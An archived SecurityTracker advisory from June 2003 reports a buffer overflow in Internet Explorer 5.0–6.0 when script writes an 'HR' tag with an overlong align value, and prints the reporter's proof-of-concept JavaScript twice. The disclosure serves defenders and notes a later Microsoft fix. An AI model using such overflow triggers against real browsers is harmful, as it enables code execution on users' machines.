SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Web Browser)  >  Microsoft Internet Explorer (IE) Vendors:  Microsoft
Microsoft Internet Explorer Buffer Overflow in Processing Scripted 'HR' Tags Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1007072
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 27 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.0, 5.5, 6.0
Description:  A buffer overflow vulnerability was reported in Microsoft Internet Explorer. A remote user can create HTML that will execute arbitrary code on the target user's system.

Digital Scream reported that a remote user can create HTML containing scripting code that writes a specially crafted "HR" tag to trigger a stack overflow. When a target user views the HTML, the overflow can cause arbitrary code to be executed with the privileges of the target user.

Another user (xenophi1e) reports that the overflow occurs in HTML32.cnv and that a remote user can effectively control the EBP, EIP, and other registers.

A demonstration exploit is provided:

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
<script>
Impact:  A remote user can create HTML that, when loaded by the target user, will execute arbitrary code on the target user's computer with the privileges of the target user.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  Digital Scream <digitalscream@real.xakep.ru>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 9 2003 (Microsoft Issues Fix) Microsoft Internet Explorer Buffer Overflow in Processing Scripted 'HR' Tags Lets Remote Users Execute Arbitrary Code   (secnotif@microsoft.com)
Microsoft has released a fix for their affected operating systems.


 Source Message Contents
Date:  22 Jun 2003 00:58:21 -0000
From:  Digital Scream <digitalscream@real.xakep.ru>
Subject:  Internet Explorer &gt;=5.0 : Buffer overflow

 



&lt;script&gt;
 wnd=open("about:blank","",""); 
 wnd.moveTo(screen.Width,screen.Height);
 WndDoc=wnd.document;
 WndDoc.open();
 WndDoc.clear();
 buffer="";
 for(i=1;i<=127;i++)buffer+="X";
 buffer+="DigitalScream";
 WndDoc.write("<HR align='"+buffer+"'>");
 WndDoc.execCommand("SelectAll");
 WndDoc.execCommand("Copy");
 wnd.close();
&lt;/script&gt;

Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC